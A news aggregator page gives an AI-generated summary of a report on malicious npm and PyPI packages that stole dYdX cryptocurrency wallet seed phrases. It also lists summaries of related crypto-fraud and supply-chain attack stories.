Tech News
Back to home
Technology

Malicious packages for dYdX cryptocurrency exchange empties user wallets

Source

Ars Technica

Published

TL;DR

AI Generated

Malicious packages on npm and PyPI repositories targeted dYdX cryptocurrency exchange, stealing wallet credentials and backdooring devices. The compromised versions put applications at risk of complete wallet compromise and irreversible cryptocurrency theft. The attack impacted various versions of npm and PyPI packages. The malware extracted seed phrases and device fingerprints, allowing threat actors to track victims across compromises. The domain used for exfiltrating data mimicked the legitimate dYdX service through typosquatting.

Read Full Article

Similar Articles

Tennessee bans crypto ATMs that have become 'payment portal of choice for scammers' — second state to restrict machines after Indiana

Tennessee bans crypto ATMs that have become 'payment portal of choice for scammers' — second state to restrict machines after Indiana

Tennessee has joined Indiana in banning cryptocurrency ATMs due to their association with scams and fraud, with Minnesota considering similar legislation. The FBI has warned of significant losses due to fraud involving these machines. Despite not being inherently fraudulent, cybercriminals exploit crypto ATMs to steal funds from victims who mistakenly believe they offer the same protections as banks. Law enforcement actions against operators like Bitcoin Depot and Athena Bitcoin highlight the growing concerns around crypto ATM scams, leading to increased regulatory measures across states to protect consumers.

Tom's Hardware
Techie buys fake Ledger Nano S+ hardware crypto wallet and almost falls for phishing — a convincing clone would have caught newbies unaware

Techie buys fake Ledger Nano S+ hardware crypto wallet and almost falls for phishing — a convincing clone would have caught newbies unaware

Brazilian cybersecurity professional Joje Mendes nearly fell victim to a sophisticated hardware-and-software phishing attack involving a fake Ledger Nano S+ cryptocurrency wallet purchased from a Chinese marketplace. Despite the device being priced similarly to a legitimate one, Mendes discovered it was a counterfeit upon arrival, thanks to Ledger's software verification. Upon dissecting the device, Mendes found it contained an ESP32-S3 SoC and was designed to harvest data through a fake Ledger app, leading unsuspecting users to a malicious website for downloading harmful apps. Mendes reported the incident to Ledger and plans to investigate further, emphasizing the importance of purchasing security devices directly from manufacturers or authorized sellers.

Tom's Hardware
US-sanctioned currency exchange says $15 million heist done by "unfriendly states"

US-sanctioned currency exchange says $15 million heist done by "unfriendly states"

Grinex, a US-sanctioned cryptocurrency exchange in Kyrgyzstan, announced a $15 million heist allegedly orchestrated by hackers linked to "unfriendly states." TRM researchers confirmed the theft, noting more drained addresses than initially reported by Grinex. The attack targeted Russian users, with Grinex attributing it to a coordinated effort to harm Russia's financial sovereignty. TokenSpot, another Kyrgyzstan-based exchange, was also breached, with both exchanges becoming inoperable on Wednesday. The US Treasury Department had previously sanctioned Grinex's predecessor, Garantex, for facilitating ransomware actors and cybercriminals.

Ars Technica
HWMonitor and CPU-Z developer CPUID breached by unknown attackers — cyberattack forced users to download malware instead of valid apps for six hours

HWMonitor and CPU-Z developer CPUID breached by unknown attackers — cyberattack forced users to download malware instead of valid apps for six hours

Unknown attackers breached the website of CPUID, the developer of HWMonitor and CPU-Z, serving users infected files instead of legitimate ones for six hours. The malware aimed to steal browser credentials, particularly from Google Chrome. The breach was fixed, and CPUID's original files were not compromised. Supply chain attacks like this have become more common, with popular tech tools being targeted to distribute malware. Users who downloaded the infected files may have had their systems compromised.

Tom's Hardware

We use cookies

We use cookies to ensure you get the best experience on our website. For more information on how we use cookies, please see our cookie policy.